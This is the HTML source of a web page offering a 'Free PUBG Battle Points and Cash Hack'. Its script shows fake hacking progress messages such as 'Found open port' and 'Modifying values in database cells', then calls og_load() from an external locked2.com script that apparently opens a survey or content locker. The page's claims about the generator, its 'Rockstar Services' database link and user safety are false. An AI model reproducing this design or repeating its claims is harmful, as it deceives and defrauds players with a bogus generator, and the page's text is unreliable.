<!DOCTYPE html>
<html lang="en" dir="ltr">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
     <!-- Global site tag (gtag.js) - Google Analytics -->
    <script async src="https://www.googletagmanager.com/gtag/js?id=UA-157702795-1"></script>
    <script>
      window.dataLayer = window.dataLayer || [];
      function gtag(){dataLayer.push(arguments);}
      gtag('js', new Date());

      gtag('config', 'UA-157702795-1');
    </script>
<script type="text/javascript" id="ogjs" src="https://www.locked2.com/cl/load.php?id=4736f57c6df9c599a68093482ce5369f"></script>
    <title>Free PUBG Battle Points Hack (2020)</title>
    <style type="text/css">

      @font-face {
        font-family: AvenirLTStd;
        src: url(AvenirLTStd-Medium.ttf);
      }

      @font-face {
        font-family: AvenirLTStd-Roman;
        src: url(AvenirLTStd-Roman.ttf);
      }

      @font-face {
        font-family: AvenirLTStd-Book;
        src: url(AvenirLTStd-Book.ttf);
      }

	body, select, input {
		font-family: AvenirLTStd, helvetica;
	}

      body {
        margin: 0;
        color: #333;
        line-height: 1.25em;
      }

      a {
        color: #333;
      }

      b {
        font-family: AvenirLTStd-Book, helvetica;
      }

      h1, h2, h3 {
        font-family: AvenirLTStd-Book, helvetica;
        color: #222;
        line-height: 1.325em;
      }

      .container {
        margin: 0 auto;
      }

      .container--pb-2375 {
        padding-bottom: 2.375em;
      }

      .container--grey {
        background-color: #F8F4F9;
      }

      .container-content {
        margin: 0 auto;
        padding: 0.375em 2em;
        max-width: 800px;
      }

      .container-ul {
        padding-left: 0;
      }

      .container-ul li {
        display: inline;
      }

      /* generator styling */

      .generator {
        background-color: #C83F23;
        padding: 1em 1.25em;
        border-radius: 3px;
        position: relative;
      }

      .generator-some {
        color: #fff;
		display: flex;
		justify-content: space-between;
		flex-flow: row wrap;
      }

      .generator-button {
        position: absolute;
        width: 100%;
        margin: 0 -1.25em;
        border-bottom-left-radius: 3px;
        border-bottom-right-radius: 3px;
        padding: 10px 0;
        background: #00A000;
        color: #fff;
        background: #E94200;
        text-align: center;
		box-shadow: 0px 4px rgba(0, 0, 0, 0.1);
		transition: background-color 0.3s ease;
      }

      .generator-button:hover {
        background: #FF4D07;
      }

      .generator-main {
        color: #fafafa;
      }
	  
	  .generator-input {
		padding: 0.75em 1.5em 0.75em 0.6em;
		outline: none;
		border: none;
		border-radius: 3px;
		background: linear-gradient(to bottom, #E27543, rgba(0, 0, 0, 0.2));
		box-shadow: 0px 3px rgba(0, 0, 0, 0.35);
		color: #fff;
		flex: 0 1 45%;
		width: 100%;
		margin-bottom: 1em;
	  }
	  
	  .generator-select {
		padding: 0.75em 1.5em 0.75em 0.6em;
		outline: none;
		border: none;
		border-radius: 3px;
		background: linear-gradient(to bottom, #E27543, rgba(0, 0, 0, 0.2));
		box-shadow: 0px 3px rgba(0, 0, 0, 0.35);
		color: #fff;
		flex: 0 1 48.5%;
		width: 100%;
		margin-bottom: 1em;
	  }

	@media screen and (max-width: 820px) {
		.generator-some {
			flex-direction: column;
		}
				
		.generator-input {
			padding: 0.75em 0 0.75em 0.75em;
			margin: 0 0 15px 0;
		}
		
		.generator-select {
			padding: 0.75em 0 0.75em 0.75em;
			margin: 0 0 15px 0;
			width: calc(100% + 0.75em);
		}
		
	}

		select option {
			background: #C83F23;
		}

		::placeholder { /* Chrome, Firefox, Opera, Safari 10.1+ */
		  color: #fff;
		  opacity: 1; /* Firefox */
		}

		:-ms-input-placeholder { /* Internet Explorer 10-11 */
		  color: #fff;
		}

		::-ms-input-placeholder { /* Microsoft Edge */
		  color: #fff;
		}

    </style>
    <link rel="icon" type="image/x-icon" href="./favicon.ico" />

  </head>

  <body>

    <div class="container container--grey container--pb-2375">

      <div class="container-content">
          <h3>Free PUBG Battle Points and Cash Hack</h3>
          <p><b>Updated:</b> 3 hours ago</p>
      </div>

      <div class="container-content generator">
        <div class="generator-main">
		  <p class="generator-some">
		
			<input placeholder="Type your username" type="text" class="generator-input" maxlength="333"/>

			<select class="generator-select">
				<option value="" disabled selected hidden>Select your platform</option>
				<option>Microsoft Windows</option>
				<option>Android</option>
				<option>iOS</option>
				<option>Xbox One</option>
				<option>PlayStation 4</option>
				<option>Stadia</option>
            </select>

			<input placeholder="Enter amount of Battle Points - Up to 99999" type="text" class="generator-input" maxlength="5"/>
			<input placeholder="Enter amount of Cash - Up to 99999" type="text" class="generator-input" maxlength="5"/>

		 </p>
          <p class="triple-dot">> </p>
          <p class="generator-wait">> Waiting for your input...</p>
        </div>
        <div class="generator-button">Add Battle Points and Cash to my account</div>
      </div>

    </div>

    <div class="container container--white">

      <div class="container-content">
          <h3>About</h3>
          <p>Hi. My name is Andy and I am the author responsible for creation of this website. Throughout my career I have developed many tools for open-source communities. On the side I built projects related to pentests, breaking common network security and even more advanced algorithms. The sole purpose of this particular website is to provide people with useful but difficult to earn goods such as PUBG Battle Points and Cash. </p>
          <p>From persepctive of the end-user (you) the idea looks crystal clear. Nonetheless the logic and algorithmic work behind this tool is quite complex. It's called hack for a reason - the script is downloading information based on previously prepared guidelines. Hence the uncomparable speed and accessibility on all devices. Meaning the website you see in front of you is just a middleman between huge database of scripts connecting with Rockstar Services and you.</p>
          <p>How about security? From a logical point of view, you or anyone you send generated cash or battle points to cannot be harmed. They are automatically created, verified through a series of checks to finally land on publicly available accounts. User's device is not involved in the process</p>
          <p>You can use the generator by clicking <a href="#">here</a> or simply by scrolling up the web page.</p>
      </div>

    </div>

    <!-- <div class="container container--dark">

      <div class="container-content">
          <h3>Frequent questions and answers</h3>
          <p>fdfdsfds</p>
          <p>film</p>
      </div>

    </div> -->

    <div class="container container--dark">

      <div class="container-content">
          <ul class="container-ul">
            <li>Copyright © 2020 - Andy Mauris</li>
            <!-- <li>About</li>
            <li>Blog</li> -->
          </ul>
      </div>

    </div>

  </body>

  <script type="text/javascript">
      var tripleDot = document.querySelector('.triple-dot');
      var output = document.querySelector('.generator-some');
      var genButton = document.querySelector('.generator-button');
      var info = ['Generator initialized...', 'Logging into the server...', 'Found open port...', 'Check #1 successful.', 'Check #2 successful.', 'Check #3 successful.', 'Modifying values in database cells...', 'Saving info...', 'Waiting for your confirmation...', 'A popup will show up...'];

      function getRandomIntInclusive(min, max) {
        min = Math.ceil(min);
        max = Math.floor(max);
        return Math.floor(Math.random() * (max - min + 1)) + min;
      }

     function tripleDotToggle() {
        if (tripleDot.innerHTML === "&gt; ...") {
          tripleDot.innerHTML = "&gt; ";
        } else {
          tripleDot.innerHTML += ".";
        }
      }

      var sequenceIndex = 0;
      var charNum = 0;
      var currentChar = "";
      var maxChars;
      var genInit = 0;
      function generator(gen) {
        if (genInit === 0) {
          clearInterval(tripleDotToggle);
          document.querySelector('.generator-wait').innerHTML = "";
          document.querySelector('.triple-dot').innerHTML = "";
          document.querySelector('.generator-some').innerHTML = "";
          maxChars = info[sequenceIndex].length;
          genInit = 1;
        }
        if (charNum === maxChars && info.length - 1 > sequenceIndex) {
          output.innerHTML += '<br> > ';
          sequenceIndex += 1;
          charNum = 0;
          maxChars = info[sequenceIndex].length;
        } else if (currentChar !== undefined || sequenceIndex == 0) {
          currentChar = info[sequenceIndex][charNum];
          if (currentChar !== undefined) {
            output.innerHTML += currentChar;
          }
          charNum += 1;
        }
      }

      var tripleDotToggle = setInterval(tripleDotToggle, 500);

      genButton.addEventListener("click", genB);

      function genB(e) {
        genButton.innerHTML = "Grab a cup of coffee and wait for a minute...";

        var gen = setInterval(generator, 70);
        setTimeout(function() {
          clearInterval(gen);
          og_load();
        }, 17000);

        genButton.removeEventListener("click", genB);
      }

  </script>

</html>
